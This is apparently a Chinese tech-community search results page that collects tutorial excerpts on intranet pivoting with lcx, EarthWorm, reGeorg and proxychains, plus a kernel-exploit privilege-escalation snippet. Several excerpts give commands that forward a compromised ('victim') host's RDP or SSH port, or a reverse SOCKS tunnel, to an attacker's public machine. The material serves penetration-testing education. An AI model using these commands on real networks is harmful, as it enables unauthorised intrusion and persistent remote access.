首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

lcx实现端口转发

lcx实现端口转发 概念 比较经典的就是lcx。简单说一下概念,首先内网中的主机一般都是使用的私有ip,在网络出口处经过NAT转换为公网ip后,才能访问internet。...所以,有时当我们进入网站后台cmd,或者捕获了一台内网中的肉鸡,是无法主动去链接这台肉鸡的,也不好在别人的网络出口做端口映射,这就体现lcx的作用了。...lcx实现端口转发,将肉鸡A上的某个端口(常用的3389),转发到具有公网地址的主机B上,这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上,从而突破了内网私有ip的限制。...使用 攻击者ip:192.168.1.2 受害者ip:192.168.1.3 将lcx.exe上传到受害者主机上,执行: lcx.exe -slave 192.168.1.2 8080 192.168.1.3...3389 然后攻击者主机上执行: lcx.exe -listen 8080 9999 这样就将受害者主机的3389服务转发到攻击者本地的9999端口上了。

99410
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    lcx端口转发详细介绍及使用方法(lcx内网转发姿势)

    下面就先详细讲解下LXC转发工具与使用方法: lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上, 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389...上传lcx.exe到肉鸡 然后 cx.exe -listen 51 3389 意思是监听51端口并转发到3389端口。...[+] Waiting for Client on port:51 …… 然后在肉鸡上运行 lcx.exe -slave 你的IP 51 222.221.221.22 3389 222.221.221.22...3389连接时格式 127.0.0.1:3333 内网转发姿势 一、lcx 的使用 肉鸡上执行:lcx.exe –slave 公网 ip + 端口 肉鸡 ip + 端口 例如:lcx.exe -slave...–listen 10000 10001 例如:Lcx.exe –listen 10001 10000 意思是监听公网 ip 机器上的 10001 端口请求,并将 10001 的请求传送给 10000

    3.4K30

    EW入侵内网渗透记录

    工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。...EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。...其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。...如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。...注意Socks协议只能下到网络层,ICMP属于链路层无法代理。 因此proxychains ping命令不能正常工作。 ? 验证内网WIN主机是否开启防火墙, ?

    2.3K20

    内网渗透 | 内网转发工具的使用

    的场景) LCX实现本地端口转发(Linux的场景) LCX实现SSH到内网主机(公网服务器是Windows) LCX实现SSH到内网主机(公网服务器是Linux) LCX实现3389到内网主机(公网服务器是...Lcx有它的局限性,比如原始版本不支持linux,不免杀等等,但lcx在某些特定的场合依然发挥着重要的作用。同样基于Socket协议。...LCX实现本地端口转发(Linux的场景) 我们现在拿到了一台主机的账号、密码和权限,现在想远程SSH连接该主机,该主机的22端口只对内开放,不对外开放。所以,我们可以利用lcx进行本地端口的转发。...ssh连接到公网服务器的2222端口即可 LCX实现SSH到内网主机(公网服务器是Linux) 首先,在VPS上进行下面操作。...我们现在想SSH到内网Linux主机。 于是,我们还可以利用lcx来进行3389端口的转发。

    2.6K20

    【内网渗透】关于内网代理转发技术

    Part.0 目录 一、端口转发类 1.Lcx 本地端口转发 正向端口转发 反向端口转发 Linuxlcx 2、Netsh 本地端口转发 正向端口转发 3、SSH 二、SOCKS代理类 1...Linuxlcx Linux版本的lcx叫做portmap 先将对应的c文件上传至linux服务器中: ? 通过gcc进行编译后即可使用: gcc portmap.c -o lcx ?.../lcx -m l -p1 8888 -h2 192.168.3.140 -p2 3389 ? 尝试连接linux的8888端口: ? 成功连接至window的3389端口: ?...reGeorg+proxychains 攻击机如果为linux环境,则使用proxychains进行代理。第一步依然是将webshell上传至目标服务器: ?...该工具共有6种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran) 静态端口转发功能和lcx类似,下面来讲讲socks代理功能。

    2.7K21

    内网隐藏通信隧道技术——EW隧道

    内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...、lcx_tran) -l 本地要监听的端口 -f 要主动连接的ip -g 要主动连接的端口 -d 要反弹到的ip -e 要反弹到的端口 -s 工作模式 工作模式支持如下: lcx_tran 正向tcp...端口转发,监听在本地 lcx_slave 反向tcp转发客户端 lcx_listen 反向tcp服务端 ssocksd 创建正向socks代理服务端,监听在本地,直接把当前环境socks代理出去 rssocks.../ew -s lcx_listen -l 1080 -e 8888 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 $ ..../ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999 b) lcx_listen、lcx_slave 的用法 $ .

    2K50

    内网漫游之SOCKS代理大结局

    0×03 socket端口转发 首先我们介绍下最为经典也是使用最为频繁的端口转发工具lcxlcx.exe 是一个基于 socket 套接字实现的端口转发工具,它是从 linux 下的htran 工具移植到...工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内,强烈推荐使用。...EW的使用也非常简单,该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。...这个操作分为4步,用到lcx_listen和lcx_slave命令: A. 先上传ew 到左侧公网VPS上,运行下列命令: ew –s lcx_listen –l 10800 –e 888 ?...2.LINUX下使用proxychains KALI系统已经预装好了这个工具,我们稍作配置就可以使用,打开终端,输入命令: vi /etc/proxychains.conf # 顺便补充下LINUX下Vim

    2.2K10

    米斯特白帽培训讲义(v2)漏洞篇 提权

    lcx.exe上传至本机和肉鸡之后,首先确定本机的 IP 为119.90.140.191: ? 然后我们在本机执行: lcx.exe -listen 51 3388 ?...之后,我们在本机或其他主机上使用远程连接客户端,连接119.90.140.191:3388,可以看到lcx中显示了转发的信息。 ?...远程连接客户端的封包会发给主机的lcx,之后会发给肉鸡的lcx,之后会发给肉鸡的远程连接服务。响应封包会按原路返回。 等待一会儿之后,我们成功连接了肉鸡的远程桌面: ?...Linux Exp 提权 首先根据uname -a查看内核版本,之后根据内核版本找 Exp: ? 之后我们执行以下命令来编译: gcc -pthread exp.c -o exp 然后执行....附录 米斯特白帽子培训第二期视频教程 Kali Linux 秘籍 第七章 权限提升 CVE-2016-5195 脏牛漏洞

    91930

    内网隧道搭建总结(一)

    环境配置 该操作在vm虚拟机中完成,提前安装了Windows7、kali linux、Windows server2008。...分别是win7、server2008、kali linux 因为需要从不同的角度来进行配置ip地址,所以在这里先不固定ip地址。...LCX Lcx是一款端口转发工具,一般使用条件: 内网服务器可以出网 服务器在外网,但是服务器安装了某些防护禁止敏感端口连接,如果发生这种,可以查看哪些端口允许传输数据,用这些端口将3389端口进行转发...4.1 windows下使用 直接使用lcx.exe在两个主机上进行使用 首先在内网机winserver2008上使用端口转发 Lcx是一种一对一的端口转发,效率比较低,而且又可能会被杀软杀掉。...4.2 Linux下用 这里使用的是一台 Ubuntu 16.04 10.211.55.14 还有一台kali linux 10.211.55.23 Usage:.

    2.1K10
    领券